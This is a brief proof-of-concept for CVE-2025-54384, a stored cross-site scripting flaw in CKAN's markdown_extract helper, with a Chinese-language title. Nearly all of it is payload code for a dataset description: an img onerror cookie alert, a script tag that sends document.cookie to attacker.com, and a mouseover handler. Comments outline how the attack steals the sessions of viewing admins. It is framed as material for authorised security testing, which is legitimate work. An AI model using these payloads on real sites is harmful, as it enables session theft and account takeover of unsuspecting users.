CVE-2025-54384: CKAN helpers.markdown_extract XSS跨站脚本漏洞

// CVE-2025-54384 XSS PoC - CKAN markdown_extract() Sanitization Bypass // This PoC demonstrates the stored XSS vulnerability in CKAN's markdown_extract helper // Attacker submits malicious Markdown content when creating/updating a dataset: const maliciousMarkdown = ` # Malicious Dataset Some description with <img src=x onerror=alert(document.cookie)> embedded. Or using script tag: <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> Or event handler on any element: <div onmouseover=alert('XSS')>Hover over me</div> `; // When CKAN renders the dataset page using markdown_extract(), // the malicious HTML/JS is rendered without proper sanitization, // leading to XSS execution in victim's browser. // Example attack scenario: // 1. Attacker creates a dataset with malicious description // 2. Victim (admin/user) views the dataset page // 3. Malicious JS executes in victim's browser context // 4. Attacker can steal session cookies, perform actions as victim // Note: This PoC is for educational and security testing purposes only. // Always obtain proper authorization before testing vulnerabilities.